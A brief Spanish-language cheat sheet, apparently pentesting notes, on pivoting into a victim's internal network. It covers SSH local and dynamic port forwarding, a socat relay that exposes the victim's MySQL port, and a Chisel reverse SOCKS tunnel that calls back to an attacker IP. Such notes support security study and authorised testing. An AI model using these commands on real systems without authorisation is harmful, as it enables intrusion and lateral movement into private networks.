Tunneling & Port Forwarding
Técnicas para acceder a puertos internos que no están expuestos a internet.
1. SSH Port Forwarding
Si tienes credenciales SSH de la víctima.
Local Port Forwarding (-L): “Traer un puerto de la víctima a mi Kali”. (Quiero ver el puerto 8080 de la víctima en mi puerto 8080).
ssh user@<IP_VICTIMA> -L 8080:127.0.0.1:8080
Dynamic Port Forwarding (-D): “Crear un proxy SOCKS para ver TODA la red de la víctima”.
ssh user@<IP_VICTIMA> -D 1080
# Luego configura /etc/proxychains.conf con: socks5 127.0.0.1 1080
2. Socat
Herramienta “navaja suiza” para redirigir tráfico.
Exponer puerto interno hacia fuera: Si la víctima tiene el puerto 3306 (MySQL) cerrado al exterior, pero quieres que sea accesible en el puerto 4444 externo.
# En la víctima
./socat TCP-LISTEN:4444,fork TCP:127.0.0.1:3306 &
3. Chisel (EL REY del Tunneling HTTP)
Funciona incluso si solo sale tráfico HTTP/HTTPS.
Escenario: Reverse Tunnel (SOCKS Proxy)
- Atacante (Server):
./chisel server -p 8000 --reverse - Víctima (Client):
./chisel client <IP_ATACANTE>:8000 R:socks - Atacante: Configura proxychains al puerto 1080 (por defecto de chisel).